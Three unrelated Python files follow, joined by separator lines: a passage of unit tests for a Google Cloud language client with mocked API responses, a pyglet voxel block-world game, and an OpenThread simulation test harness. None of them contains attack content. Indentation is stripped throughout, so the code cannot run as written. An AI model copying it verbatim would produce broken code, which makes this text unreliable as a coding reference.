salience2 = 0.086085409
sentiment = Sentiment(score=0.15, magnitude=42)
response = {
'entities': [
{
'name': name1,
'type': EntityType.OTHER,
'metadata': {},
'salience': salience1,
'mentions': [
{
'text': {
'content': name1,
'beginOffset': -1
},
'type': 'TYPE_UNKNOWN',
}
],
'sentiment': {
'score': 0.15,
'magnitude': 42,
}
},
{
'name': name2,
'type': EntityType.LOCATION,
'metadata': {'wikipedia_url': wiki2},
'salience': salience2,
'mentions': [
{
'text': {
'content': name2,
'beginOffset': -1,
},
'type': 'PROPER',
},
],
'sentiment': {
'score': 0.15,
'magnitude': 42,
}
},
],
'language': 'en-US',
}
client = make_mock_client(response, api_version='v1beta2')
document = self._make_one(client, content)
entity_response = document.analyze_entity_sentiment()
self.assertEqual(len(entity_response.entities), 2)
entity1 = entity_response.entities[0]
self._verify_entity(entity1, name1, EntityType.OTHER,
None, salience1, sentiment)
entity2 = entity_response.entities[1]
self._verify_entity(entity2, name2, EntityType.LOCATION,
wiki2, salience2, sentiment)
# Verify the request.
expected = self._expected_data(
content, encoding_type=Encoding.get_default())
client._connection.api_request.assert_called_once_with(
path='analyzeEntitySentiment', method='POST', data=expected)
def _verify_sentiment(self, sentiment, score, magnitude):
from google.cloud.language.sentiment import Sentiment
self.assertIsInstance(sentiment, Sentiment)
self.assertEqual(sentiment.score, score)
self.assertEqual(sentiment.magnitude, magnitude)
def test_analyze_sentiment(self):
from google.cloud.language.api_responses import SentimentResponse
content = 'All the pretty horses.'
score = 1
magnitude = 0.6
response = {
'documentSentiment': {
'score': score,
'magnitude': magnitude,
},
'language': 'en-US',
}
client = make_mock_client(response)
document = self._make_one(client, content)
sentiment_response = document.analyze_sentiment()
self.assertIsInstance(sentiment_response, SentimentResponse)
self._verify_sentiment(sentiment_response.sentiment, score, magnitude)
# Verify the request.
expected = self._expected_data(content)
client._connection.api_request.assert_called_once_with(
path='analyzeSentiment', method='POST', data=expected)
def _verify_token(self, token, text_content, part_of_speech_tag, lemma):
from google.cloud.language.syntax import Token
self.assertIsInstance(token, Token)
self.assertEqual(token.text_content, text_content)
self.assertEqual(token.part_of_speech.tag, part_of_speech_tag)
self.assertEqual(token.lemma, lemma)
def test_analyze_syntax(self):
from google.cloud.language.api_responses import SyntaxResponse
from google.cloud.language.document import Encoding
from google.cloud.language.syntax import PartOfSpeech
name1 = 'R-O-C-K'
name2 = 'USA'
content = name1 + ' in the ' + name2
response = {
'sentences': [
{
'text': {
'content': 'R-O-C-K in the USA',
'beginOffset': -1,
},
'sentiment': None,
}
],
'tokens': [
{
'text': {
'content': 'R-O-C-K',
'beginOffset': -1,
},
'partOfSpeech': {
'aspect': 'ASPECT_UNKNOWN',
'reciprocity': 'RECIPROCITY_UNKNOWN',
'case': 'CASE_UNKNOWN',
'mood': 'MOOD_UNKNOWN',
'tag': 'NOUN',
'person': 'PERSON_UNKNOWN',
'number': 'SINGULAR',
'tense': 'TENSE_UNKNOWN',
'form': 'FORM_UNKNOWN',
'proper': 'PROPER',
'voice': 'VOICE_UNKNOWN',
'gender': 'GENDER_UNKNOWN'
},
'dependencyEdge': {
'headTokenIndex': 0,
'label': 'ROOT',
},
'lemma': 'R-O-C-K',
},
{
'text': {
'content': 'in',
'beginOffset': -1,
},
'partOfSpeech': {
'aspect': 'ASPECT_UNKNOWN',
'reciprocity': 'RECIPROCITY_UNKNOWN',
'case': 'CASE_UNKNOWN',
'mood': 'MOOD_UNKNOWN',
'tag': 'ADP',
'person': 'PERSON_UNKNOWN',
'number': 'NUMBER_UNKNOWN',
'tense': 'TENSE_UNKNOWN',
'form': 'FORM_UNKNOWN',
'proper': 'PROPER_UNKNOWN',
'voice': 'VOICE_UNKNOWN',
'gender': 'GENDER_UNKNOWN'
},
'dependencyEdge': {
'headTokenIndex': 0,
'label': 'PREP',
},
'lemma': 'in',
},
{
'text': {
'content': 'the',
'beginOffset': -1,
},
'partOfSpeech': {
'aspect': 'ASPECT_UNKNOWN',
'reciprocity': 'RECIPROCITY_UNKNOWN',
'case': 'CASE_UNKNOWN',
'mood': 'MOOD_UNKNOWN',
'tag': 'DET',
'person': 'PERSON_UNKNOWN',
'number': 'NUMBER_UNKNOWN',
'tense': 'TENSE_UNKNOWN',
'form': 'FORM_UNKNOWN',
'proper': 'PROPER_UNKNOWN',
'voice': 'VOICE_UNKNOWN',
'gender': 'GENDER_UNKNOWN'
},
'dependencyEdge': {
'headTokenIndex': 3,
'label': 'DET',
},
'lemma': 'the',
},
{
'text': {
'content': 'USA',
'beginOffset': -1,
},
'partOfSpeech': {
'aspect': 'ASPECT_UNKNOWN',
'reciprocity': 'RECIPROCITY_UNKNOWN',
'case': 'CASE_UNKNOWN',
'mood': 'MOOD_UNKNOWN',
'tag': 'NOUN',
'person': 'PERSON_UNKNOWN',
'number': 'SINGULAR',
'tense': 'TENSE_UNKNOWN',
'form': 'FORM_UNKNOWN',
'proper': 'PROPER',
'voice': 'VOICE_UNKNOWN',
'gender': 'GENDER_UNKNOWN'
},
'dependencyEdge': {
'headTokenIndex': 1,
'label': 'POBJ',
},
'lemma': 'USA',
},
],
'language': 'en-US',
}
client = make_mock_client(response)
document = self._make_one(client, content)
syntax_response = document.analyze_syntax()
self.assertIsInstance(syntax_response, SyntaxResponse)
tokens = syntax_response.tokens
self.assertEqual(len(tokens), 4)
token1 = tokens[0]
self._verify_token(token1, name1, PartOfSpeech.NOUN, name1)
token2 = tokens[1]
self._verify_token(token2, 'in', PartOfSpeech.ADPOSITION, 'in')
token3 = tokens[2]
self._verify_token(token3, 'the', PartOfSpeech.DETERMINER, 'the')
token4 = tokens[3]
self._verify_token(token4, name2, PartOfSpeech.NOUN, name2)
# Verify the request.
expected = self._expected_data(
content, encoding_type=Encoding.get_default())
client._connection.api_request.assert_called_once_with(
path='analyzeSyntax', method='POST', data=expected)
def _verify_sentences(self, include_syntax, annotations):
from google.cloud.language.sentence import Sentence
if include_syntax:
self.assertEqual(len(annotations.sentences), 1)
sentence = annotations.sentences[0]
self.assertIsInstance(sentence, Sentence)
self.assertEqual(sentence.content, ANNOTATE_CONTENT)
self.assertEqual(sentence.begin, -1)
else:
self.assertEqual(annotations.sentences, [])
def _verify_tokens(self, annotations, token_info):
from google.cloud.language.syntax import Token
self.assertEqual(len(annotations.tokens), len(token_info))
for token, info in zip(annotations.tokens, token_info):
self.assertIsInstance(token, Token)
self.assertEqual(token.text_content, info[0])
self.assertEqual(token.text_begin, -1)
self.assertEqual(token.part_of_speech.tag, info[1])
self.assertEqual(token.edge_index, info[2])
self.assertEqual(token.edge_label, info[3])
self.assertEqual(token.lemma, info[0])
def _annotate_text_helper(self, include_sentiment,
include_entities, include_syntax):
from google.cloud.language.document import Annotations
from google.cloud.language.document import Encoding
from google.cloud.language.entity import EntityType
token_info, sentences = _get_token_and_sentences(include_syntax)
entities = _get_entities(include_entities)
tokens = [_make_token_json(*info) for info in token_info]
response = {
'sentences': sentences,
'tokens': tokens,
'entities': entities,
'language': 'en-US',
}
if include_sentiment:
response['documentSentiment'] = {
'score': ANNOTATE_SCORE,
'magnitude': ANNOTATE_MAGNITUDE,
}
client = make_mock_client(response)
document = self._make_one(client, ANNOTATE_CONTENT)
annotations = document.annotate_text(
include_syntax=include_syntax, include_entities=include_entities,
include_sentiment=include_sentiment)
self.assertIsInstance(annotations, Annotations)
# Sentences
self._verify_sentences(include_syntax, annotations)
# Token
self._verify_tokens(annotations, token_info)
# Sentiment
if include_sentiment:
self._verify_sentiment(annotations.sentiment,
ANNOTATE_SCORE, ANNOTATE_MAGNITUDE)
else:
self.assertIsNone(annotations.sentiment)
# Entity
if include_entities:
self.assertEqual(len(annotations.entities), 1)
entity = annotations.entities[0]
self._verify_entity(entity, ANNOTATE_NAME, EntityType.LOCATION,
ANNOTATE_WIKI_URL, ANNOTATE_SALIENCE)
else:
self.assertEqual(annotations.entities, [])
# Verify the request.
expected = self._expected_data(
ANNOTATE_CONTENT, encoding_type=Encoding.get_default(),
extract_sentiment=include_sentiment,
extract_entities=include_entities,
extract_syntax=include_syntax)
client._connection.api_request.assert_called_once_with(
path='annotateText', method='POST', data=expected)
def test_annotate_text(self):
self._annotate_text_helper(True, True, True)
def test_annotate_text_sentiment_only(self):
self._annotate_text_helper(True, False, False)
def test_annotate_text_entities_only(self):
self._annotate_text_helper(False, True, False)
def test_annotate_text_syntax_only(self):
self._annotate_text_helper(False, False, True)
|
|
from pyglet.gl import *
from pyglet.window import key
from ctypes import c_float
import math
import random
import time
SECTOR_SIZE = 16
def cube_vertices(x, y, z, n):
return [
x-n,y+n,z-n, x-n,y+n,z+n, x+n,y+n,z+n, x+n,y+n,z-n, # top
x-n,y-n,z-n, x+n,y-n,z-n, x+n,y-n,z+n, x-n,y-n,z+n, # bottom
x-n,y-n,z-n, x-n,y-n,z+n, x-n,y+n,z+n, x-n,y+n,z-n, # left
x+n,y-n,z+n, x+n,y-n,z-n, x+n,y+n,z-n, x+n,y+n,z+n, # right
x-n,y-n,z+n, x+n,y-n,z+n, x+n,y+n,z+n, x-n,y+n,z+n, # front
x+n,y-n,z-n, x-n,y-n,z-n, x-n,y+n,z-n, x+n,y+n,z-n, # back
]
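# 6 faces x 4 corners = 24 vertices (72 floats) for an axis-aligned cube of
# half-width n centered at (x, y, z), in the face order noted above.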
def tex_coord(x, y, n=4):
m = 1.0 / n
dx = x * m
dy = y * m
return dx, dy, dx + m, dy, dx + m, dy + m, dx, dy + m
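# Worked example for the default 4x4 atlas: tex_coord(1, 0) selects the square from
# (0.25, 0.0) to (0.5, 0.25) and returns (0.25, 0.0, 0.5, 0.0, 0.5, 0.25, 0.25, 0.25).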
def tex_coords(top, bottom, side):
top = tex_coord(*top)
bottom = tex_coord(*bottom)
side = tex_coord(*side)
result = []
result.extend(top)
result.extend(bottom)
result.extend(side * 4)
return result
GRASS = tex_coords((1, 0), (0, 1), (0, 0))
SAND = tex_coords((1, 1), (1, 1), (1, 1))
BRICK = tex_coords((2, 0), (2, 0), (2, 0))
STONE = tex_coords((2, 1), (2, 1), (2, 1))
FACES = [
( 0, 1, 0),
( 0,-1, 0),
(-1, 0, 0),
( 1, 0, 0),
( 0, 0, 1),
( 0, 0,-1),
]
class TextureGroup(pyglet.graphics.Group):
def __init__(self, path):
super(TextureGroup, self).__init__()
self.texture = pyglet.image.load(path).get_texture()
def set_state(self):
glEnable(self.texture.target)
glBindTexture(self.texture.target, self.texture.id)
def unset_state(self):
glDisable(self.texture.target)
def normalize(position):
x, y, z = position
x, y, z = (int(round(x)), int(round(y)), int(round(z)))
return (x, y, z)
def sectorize(position):
x, y, z = normalize(position)
x, y, z = x / SECTOR_SIZE, y / SECTOR_SIZE, z / SECTOR_SIZE
return (x, 0, z)
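# Sectors are 16x16 columns in x/z and ignore y. Under this file's Python 2 integer
# division, e.g. sectorize((17.3, 5.0, -1.2)) normalizes to (17, 5, -1) and returns
# the sector (1, 0, -1).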
class Model(object):
def __init__(self):
self.batch = pyglet.graphics.Batch()
self.group = TextureGroup('texture.png')
self.world = {}
self.shown = {}
self._shown = {}
self.sectors = {}
self.queue = []
self.initialize()
def initialize(self):
n = 80
s = 1
y = 0
for x in xrange(-n, n + 1, s):
for z in xrange(-n, n + 1, s):
self.init_block((x, y - 2, z), GRASS)
self.init_block((x, y - 3, z), STONE)
if x in (-n, n) or z in (-n, n):
for dy in xrange(-2, 3):
self.init_block((x, y + dy, z), STONE)
o = n - 10
for _ in xrange(120):
a = random.randint(-o, o)
b = random.randint(-o, o)
c = -1
h = random.randint(1, 6)
s = random.randint(4, 8)
d = 1
t = random.choice([GRASS, SAND, BRICK])
for y in xrange(c, c + h):
for x in xrange(a - s, a + s + 1):
for z in xrange(b - s, b + s + 1):
if (x - a) ** 2 + (z - b) ** 2 > (s + 1) ** 2:
continue
if (x - 0) ** 2 + (z - 0) ** 2 < 5 ** 2:
continue
self.init_block((x, y, z), t)
s -= d
def hit_test(self, position, vector, max_distance=8):
m = 8
x, y, z = position
dx, dy, dz = vector
previous = None
for _ in xrange(max_distance * m):
key = normalize((x, y, z))
if key != previous and key in self.world:
return key, previous
previous = key
x, y, z = x + dx / m, y + dy / m, z + dz / m
return None, None
def exposed(self, position):
x, y, z = position
for dx, dy, dz in FACES:
if (x + dx, y + dy, z + dz) not in self.world:
return True
return False
def init_block(self, position, texture):
self.add_block(position, texture, False)
def add_block(self, position, texture, sync=True):
if position in self.world:
self.remove_block(position, sync)
self.world[position] = texture
self.sectors.setdefault(sectorize(position), []).append(position)
if sync:
if self.exposed(position):
self.show_block(position)
self.check_neighbors(position)
def remove_block(self, position, sync=True):
del self.world[position]
self.sectors[sectorize(position)].remove(position)
if sync:
if position in self.shown:
self.hide_block(position)
self.check_neighbors(position)
def check_neighbors(self, position):
x, y, z = position
for dx, dy, dz in FACES:
key = (x + dx, y + dy, z + dz)
if key not in self.world:
continue
if self.exposed(key):
if key not in self.shown:
self.show_block(key)
else:
if key in self.shown:
self.hide_block(key)
def show_blocks(self):
for position in self.world:
if position not in self.shown and self.exposed(position):
self.show_block(position)
def show_block(self, position, immediate=True):
texture = self.world[position]
self.shown[position] = texture
if immediate:
self._show_block(position, texture)
else:
self.enqueue(self._show_block, position, texture)
def _show_block(self, position, texture):
x, y, z = position
        # face culling is disabled here: the loop below iterates over an empty list instead of FACES
index = 0
count = 24
vertex_data = cube_vertices(x, y, z, 0.5)
texture_data = list(texture)
for dx, dy, dz in []:#FACES:
if (x + dx, y + dy, z + dz) in self.world:
count -= 4
i = index * 12
j = index * 8
del vertex_data[i:i + 12]
del texture_data[j:j + 8]
else:
index += 1
# create vertex list
self._shown[position] = self.batch.add(count, GL_QUADS, self.group,
('v3f/static', vertex_data),
('t2f/static', texture_data))
def hide_block(self, position, immediate=True):
self.shown.pop(position)
if immediate:
self._hide_block(position)
else:
self.enqueue(self._hide_block, position)
def _hide_block(self, position):
self._shown.pop(position).delete()
def show_sector(self, sector):
for position in self.sectors.get(sector, []):
if position not in self.shown and self.exposed(position):
self.show_block(position, False)
def hide_sector(self, sector):
for position in self.sectors.get(sector, []):
if position in self.shown:
self.hide_block(position, False)
def change_sectors(self, before, after):
before_set = set()
after_set = set()
pad = 4
for dx in xrange(-pad, pad + 1):
for dy in [0]: # xrange(-pad, pad + 1):
for dz in xrange(-pad, pad + 1):
if dx ** 2 + dy ** 2 + dz ** 2 > (pad + 1) ** 2:
continue
if before:
x, y, z = before
before_set.add((x + dx, y + dy, z + dz))
if after:
x, y, z = after
after_set.add((x + dx, y + dy, z + dz))
show = after_set - before_set
hide = before_set - after_set
for sector in show:
self.show_sector(sector)
for sector in hide:
self.hide_sector(sector)
def enqueue(self, func, *args):
self.queue.append((func, args))
def dequeue(self):
func, args = self.queue.pop(0)
func(*args)
def process_queue(self):
start = time.clock()
while self.queue and time.clock() - start < 1 / 60.0:
self.dequeue()
def process_entire_queue(self):
while self.queue:
self.dequeue()
class Window(pyglet.window.Window):
def __init__(self, *args, **kwargs):
super(Window, self).__init__(*args, **kwargs)
self.exclusive = False
self.flying = False
self.strafe = [0, 0]
self.position = (0, 0, 0)
self.rotation = (0, 0)
self.sector = None
self.reticle = None
self.dy = 0
self.model = Model()
self.label = pyglet.text.Label('', font_name='Arial', font_size=18,
x=10, y=self.height - 10, anchor_x='left', anchor_y='top',
color=(0, 0, 0, 255))
pyglet.clock.schedule_interval(self.update, 1.0 / 60)
def set_exclusive_mouse(self, exclusive):
super(Window, self).set_exclusive_mouse(exclusive)
self.exclusive = exclusive
def get_sight_vector(self):
x, y = self.rotation
m = math.cos(math.radians(y))
dy = math.sin(math.radians(y))
dx = math.cos(math.radians(x - 90)) * m
dz = math.sin(math.radians(x - 90)) * m
return (dx, dy, dz)
def get_motion_vector(self):
if any(self.strafe):
x, y = self.rotation
strafe = math.degrees(math.atan2(*self.strafe))
if self.flying:
m = math.cos(math.radians(y))
dy = math.sin(math.radians(y))
if self.strafe[1]:
dy = 0.0
m = 1
if self.strafe[0] > 0:
dy *= -1
dx = math.cos(math.radians(x + strafe)) * m
dz = math.sin(math.radians(x + strafe)) * m
else:
dy = 0.0
dx = math.cos(math.radians(x + strafe))
dz = math.sin(math.radians(x + strafe))
else:
dy = 0.0
dx = 0.0
dz = 0.0
return (dx, dy, dz)
def update(self, dt):
self.model.process_queue()
sector = sectorize(self.position)
if sector != self.sector:
self.model.change_sectors(self.sector, sector)
if self.sector is None:
self.model.process_entire_queue()
self.sector = sector
m = 8
dt = min(dt, 0.2)
for _ in xrange(m):
self._update(dt / m)
def _update(self, dt):
# walking
speed = 15 if self.flying else 5
d = dt * speed
dx, dy, dz = self.get_motion_vector()
dx, dy, dz = dx * d, dy * d, dz * d
# gravity
if not self.flying:
self.dy -= dt * 0.044 # g force, should be = jump_speed * 0.5 / max_jump_height
self.dy = max(self.dy, -0.5) # terminal velocity
dy += self.dy
# collisions
x, y, z = self.position
x, y, z = self.collide((x + dx, y + dy, z + dz), 2)
self.position = (x, y, z)
def collide(self, position, height):
pad = 0.25
p = list(position)
np = normalize(position)
for face in FACES: # check all surrounding blocks
for i in xrange(3): # check each dimension independently
if not face[i]:
continue
d = (p[i] - np[i]) * face[i]
if d < pad:
continue
for dy in xrange(height): # check each height
op = list(np)
op[1] -= dy
op[i] += face[i]
op = tuple(op)
if op not in self.model.world:
continue
p[i] -= (d - pad) * face[i]
if face == (0, -1, 0) or face == (0, 1, 0):
self.dy = 0
break
return tuple(p)
def on_mouse_scroll(self, x, y, scroll_x, scroll_y):
return
x, y, z = self.position
dx, dy, dz = self.get_sight_vector()
d = scroll_y * 10
self.position = (x + dx * d, y + dy * d, z + dz * d)
def on_mouse_press(self, x, y, button, modifiers):
if self.exclusive:
vector = self.get_sight_vector()
block, previous = self.model.hit_test(self.position, vector)
if button == pyglet.window.mouse.LEFT:
if block:
texture = self.model.world[block]
if texture != STONE:
self.model.remove_block(block)
else:
if previous:
self.model.add_block(previous, BRICK)
else:
self.set_exclusive_mouse(True)
def on_mouse_motion(self, x, y, dx, dy):
if self.exclusive:
m = 0.15
x, y = self.rotation
x, y = x + dx * m, y + dy * m
y = max(-90, min(90, y))
self.rotation = (x, y)
def on_key_press(self, symbol, modifiers):
if symbol == key.W:
self.strafe[0] -= 1
elif symbol == key.S:
self.strafe[0] += 1
elif symbol == key.A:
self.strafe[1] -= 1
elif symbol == key.D:
self.strafe[1] += 1
elif symbol == key.SPACE:
if self.dy == 0:
self.dy = 0.015 # jump speed
elif symbol == key.ESCAPE:
self.set_exclusive_mouse(False)
elif symbol == key.TAB:
self.flying = not self.flying
def on_key_release(self, symbol, modifiers):
if symbol == key.W:
self.strafe[0] += 1
elif symbol == key.S:
self.strafe[0] -= 1
elif symbol == key.A:
self.strafe[1] += 1
elif symbol == key.D:
self.strafe[1] -= 1
def on_resize(self, width, height):
# label
self.label.y = height - 10
# reticle
if self.reticle:
self.reticle.delete()
x, y = self.width / 2, self.height / 2
n = 10
self.reticle = pyglet.graphics.vertex_list(4,
('v2i', (x - n, y, x + n, y, x, y - n, x, y + n))
)
def set_2d(self):
width, height = self.get_size()
glDisable(GL_DEPTH_TEST)
glViewport(0, 0, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, width, 0, height, -1, 1)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
def set_3d(self):
width, height = self.get_size()
glEnable(GL_DEPTH_TEST)
glViewport(0, 0, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(65.0, width / float(height), 0.1, 60.0)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
x, y = self.rotation
glRotatef(x, 0, 1, 0)
glRotatef(-y, math.cos(math.radians(x)), 0, math.sin(math.radians(x)))
x, y, z = self.position
glTranslatef(-x, -y, -z)
def on_draw(self):
self.clear()
self.set_3d()
glColor3d(1, 1, 1)
self.model.batch.draw()
self.draw_focused_block()
self.set_2d()
self.draw_label()
self.draw_reticle()
def draw_focused_block(self):
vector = self.get_sight_vector()
block = self.model.hit_test(self.position, vector)[0]
if block:
x, y, z = block
vertex_data = cube_vertices(x, y, z, 0.51)
glColor3d(0, 0, 0)
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
pyglet.graphics.draw(24, GL_QUADS, ('v3f/static', vertex_data))
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
def draw_label(self):
x, y, z = self.position
self.label.text = '%02d (%.2f, %.2f, %.2f) %d / %d' % (
pyglet.clock.get_fps(), x, y, z,
len(self.model._shown), len(self.model.world))
self.label.draw()
def draw_reticle(self):
glColor3d(0, 0, 0)
self.reticle.draw(GL_LINES)
def setup_fog():
glEnable(GL_FOG)
glFogfv(GL_FOG_COLOR, (c_float * 4)(0.53, 0.81, 0.98, 1))
glHint(GL_FOG_HINT, GL_DONT_CARE)
glFogi(GL_FOG_MODE, GL_LINEAR)
glFogf(GL_FOG_DENSITY, 0.35)
glFogf(GL_FOG_START, 20.0)
glFogf(GL_FOG_END, 60.0)
def setup():
glClearColor(0.53, 0.81, 0.98, 1)
glEnable(GL_CULL_FACE)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)
setup_fog()
def main():
window = Window(width=800, height=600, caption='Pyglet', resizable=True)
window.set_exclusive_mouse(True)
setup()
pyglet.app.run()
if __name__ == '__main__':
main()
|
|
#!/usr/bin/env python
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import config
import ipaddress
import os
import sys
import pexpect
import pexpect.popen_spawn
import re
import simulator
import socket
import time
import unittest
class Node:
def __init__(self, nodeid, is_mtd=False, simulator=None):
self.nodeid = nodeid
self.verbose = int(float(os.getenv('VERBOSE', 0)))
self.node_type = os.getenv('NODE_TYPE', 'sim')
self.simulator = simulator
if self.simulator:
self.simulator.add_node(self)
mode = os.environ.get('USE_MTD') == '1' and is_mtd and 'mtd' or 'ftd'
if self.node_type == 'soc':
self.__init_soc(nodeid)
elif self.node_type == 'ncp-sim':
# TODO use mode after ncp-mtd is available.
self.__init_ncp_sim(nodeid, 'ftd')
else:
self.__init_sim(nodeid, mode)
if self.verbose:
if sys.version_info[0] == 2:
self.pexpect.logfile_read = sys.stdout
else:
self.pexpect.logfile_read = sys.stdout.buffer
self._initialized = True
def __init_sim(self, nodeid, mode):
""" Initialize a simulation node. """
if 'OT_CLI_PATH' in os.environ.keys():
cmd = os.environ['OT_CLI_PATH']
elif 'top_builddir' in os.environ.keys():
srcdir = os.environ['top_builddir']
cmd = '%s/examples/apps/cli/ot-cli-%s' % (srcdir, mode)
else:
cmd = './ot-cli-%s' % mode
if 'RADIO_DEVICE' in os.environ:
cmd += ' -v %s' % os.environ['RADIO_DEVICE']
os.environ['NODE_ID'] = str(nodeid)
cmd += ' %d' % nodeid
print("%s" % cmd)
self.pexpect = pexpect.popen_spawn.PopenSpawn(cmd, timeout=4)
# Add delay to ensure that the process is ready to receive commands.
timeout = 0.4
while timeout > 0:
self.pexpect.send('\r\n')
try:
self.pexpect.expect('> ', timeout=0.1)
break
except pexpect.TIMEOUT:
timeout -= 0.1
def __init_ncp_sim(self, nodeid, mode):
""" Initialize an NCP simulation node. """
if 'RADIO_DEVICE' in os.environ:
args = ' %s' % os.environ['RADIO_DEVICE']
os.environ['NODE_ID'] = str(nodeid)
else:
args = ''
if 'OT_NCP_PATH' in os.environ.keys():
cmd = 'spinel-cli.py -p "%s%s" -n' % (
os.environ['OT_NCP_PATH'],
args,
)
elif "top_builddir" in os.environ.keys():
builddir = os.environ['top_builddir']
cmd = 'spinel-cli.py -p "%s/examples/apps/ncp/ot-ncp-%s%s" -n' % (
builddir,
mode,
args,
)
else:
cmd = 'spinel-cli.py -p "./ot-ncp-%s%s" -n' % (mode, args)
cmd += ' %d' % nodeid
print("%s" % cmd)
self.pexpect = pexpect.spawn(cmd, timeout=4)
# Add delay to ensure that the process is ready to receive commands.
time.sleep(0.2)
self._expect('spinel-cli >')
self.debug(int(os.getenv('DEBUG', '0')))
def _expect(self, pattern, timeout=-1, *args, **kwargs):
""" Process simulator events until expected the pattern. """
if timeout == -1:
timeout = self.pexpect.timeout
assert timeout > 0
while timeout > 0:
try:
return self.pexpect.expect(pattern, 0.1, *args, **kwargs)
except pexpect.TIMEOUT:
timeout -= 0.1
self.simulator.go(0)
if timeout <= 0:
raise
def __init_soc(self, nodeid):
""" Initialize a System-on-a-chip node connected via UART. """
import fdpexpect
serialPort = '/dev/ttyUSB%d' % ((nodeid - 1) * 2)
self.pexpect = fdpexpect.fdspawn(
os.open(serialPort, os.O_RDWR | os.O_NONBLOCK | os.O_NOCTTY)
)
def __del__(self):
self.destroy()
def destroy(self):
if not getattr(self, '_initialized', False):
return
if (
hasattr(self.pexpect, 'proc')
and self.pexpect.proc.poll() is None
or not hasattr(self.pexpect, 'proc')
and self.pexpect.isalive()
):
print("%d: exit" % self.nodeid)
self.pexpect.send('exit\n')
self.pexpect.expect(pexpect.EOF)
self.pexpect.wait()
self._initialized = False
def read_cert_messages_in_commissioning_log(self, timeout=-1):
"""Get the log of the traffic after DTLS handshake.
"""
format_str = br"=+?\[\[THCI\].*?type=%s.*?\].*?=+?[\s\S]+?-{40,}"
join_fin_req = format_str % br"JOIN_FIN\.req"
join_fin_rsp = format_str % br"JOIN_FIN\.rsp"
dummy_format_str = br"\[THCI\].*?type=%s.*?"
join_ent_ntf = dummy_format_str % br"JOIN_ENT\.ntf"
join_ent_rsp = dummy_format_str % br"JOIN_ENT\.rsp"
pattern = (
b"("
+ join_fin_req
+ b")|("
+ join_fin_rsp
+ b")|("
+ join_ent_ntf
+ b")|("
+ join_ent_rsp
+ b")"
)
messages = []
# There are at most 4 cert messages both for joiner and commissioner
for _ in range(0, 4):
try:
self._expect(pattern, timeout=timeout)
log = self.pexpect.match.group(0)
messages.append(self._extract_cert_message(log))
except BaseException:
break
return messages
def _extract_cert_message(self, log):
res = re.search(br"direction=\w+", log)
assert res
direction = res.group(0).split(b'=')[1].strip()
res = re.search(br"type=\S+", log)
assert res
type = res.group(0).split(b'=')[1].strip()
payload = bytearray([])
payload_len = 0
if type in [b"JOIN_FIN.req", b"JOIN_FIN.rsp"]:
res = re.search(br"len=\d+", log)
assert res
payload_len = int(res.group(0).split(b'=')[1].strip())
hex_pattern = br"\|(\s([0-9a-fA-F]{2}|\.\.))+?\s+?\|"
while True:
res = re.search(hex_pattern, log)
if not res:
break
data = [
int(hex, 16)
for hex in res.group(0)[1:-1].split(b' ')
if hex and hex != b'..'
]
payload += bytearray(data)
log = log[res.end() - 1:]
assert len(payload) == payload_len
return (direction, type, payload)
def send_command(self, cmd, go=True):
print("%d: %s" % (self.nodeid, cmd))
self.pexpect.send(cmd + '\n')
if go:
self.simulator.go(0, nodeid=self.nodeid)
sys.stdout.flush()
def get_commands(self):
self.send_command('?')
self._expect('Commands:')
commands = []
while True:
i = self._expect(['Done', r'(\S+)'])
if i != 0:
commands.append(self.pexpect.match.groups()[0])
else:
break
return commands
def set_mode(self, mode):
cmd = 'mode %s' % mode
self.send_command(cmd)
self._expect('Done')
def debug(self, level):
# `debug` command will not trigger interaction with simulator
self.send_command('debug %d' % level, go=False)
def start(self):
self.interface_up()
self.thread_start()
def stop(self):
self.thread_stop()
self.interface_down()
def interface_up(self):
self.send_command('ifconfig up')
self._expect('Done')
def interface_down(self):
self.send_command('ifconfig down')
self._expect('Done')
def thread_start(self):
self.send_command('thread start')
self._expect('Done')
def thread_stop(self):
self.send_command('thread stop')
self._expect('Done')
def commissioner_start(self):
cmd = 'commissioner start'
self.send_command(cmd)
self._expect('Done')
def commissioner_add_joiner(self, addr, psk):
cmd = 'commissioner joiner add %s %s' % (addr, psk)
self.send_command(cmd)
self._expect('Done')
def joiner_start(self, pskd='', provisioning_url=''):
cmd = 'joiner start %s %s' % (pskd, provisioning_url)
self.send_command(cmd)
self._expect('Done')
def clear_whitelist(self):
cmd = 'macfilter addr clear'
self.send_command(cmd)
self._expect('Done')
def enable_whitelist(self):
cmd = 'macfilter addr whitelist'
self.send_command(cmd)
self._expect('Done')
def disable_whitelist(self):
cmd = 'macfilter addr disable'
self.send_command(cmd)
self._expect('Done')
